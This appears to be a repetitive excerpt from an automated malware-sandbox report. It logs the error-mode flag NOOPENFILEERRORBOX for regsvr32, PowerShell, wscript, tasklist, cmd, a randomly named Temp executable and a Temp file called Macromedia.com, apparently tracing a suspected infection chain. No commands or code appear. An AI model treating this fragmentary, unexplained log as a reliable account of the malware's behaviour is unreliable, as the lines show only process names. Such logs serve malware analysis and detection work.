Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
